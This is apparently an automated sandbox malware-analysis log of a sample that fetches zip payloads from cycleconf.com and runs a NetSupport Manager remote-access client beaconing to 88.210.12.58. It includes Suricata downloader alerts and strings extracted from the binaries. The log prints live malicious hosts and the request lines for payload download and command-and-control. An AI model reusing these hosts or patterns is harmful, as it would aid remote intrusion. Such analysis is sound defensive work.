Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785

Source: global traffic

TCP traffic: 192.168.2.6:49723 -> 88.210.12.58:3785

Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_1.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_2.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_3.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_4.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Source: Joe Sandbox View

ASN Name: CITYLAN-ASRU CITYLAN-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49707 -> 23.254.224.41:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 23.254.224.41:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49710 -> 23.254.224.41:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 23.254.224.41:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_001925B0 GetProcessHeap,InternetOpenW,InternetOpenUrlW,GetProcessHeap,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlReAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,

0_2_001925B0

Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_1.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_2.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_3.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /dwnld/2nd2_4.zip HTTP/1.1Host: cycleconf.com
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: cycleconf.com
Source: global traffic	DNS traffic detected: DNS query: ganeres1.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 88.210.12.58Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: client32.exe, client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: client32.exe, 00000004.00000002.4574160269.0000000000640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.210.12.58/fakeurl.htm
Source: TCCTL32.DLL.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: TCCTL32.DLL.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: client32.exe, 00000004.00000002.4575278907.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.2559373410.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/
Source: client32.exe, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2
Source: client32.exe, 00000004.00000002.4575278907.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.2559373410.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp:
Source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspT
Source: client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspn
Source: client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspp
Source: client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspz
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: TCCTL32.DLL.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://sf.symcd.com0&
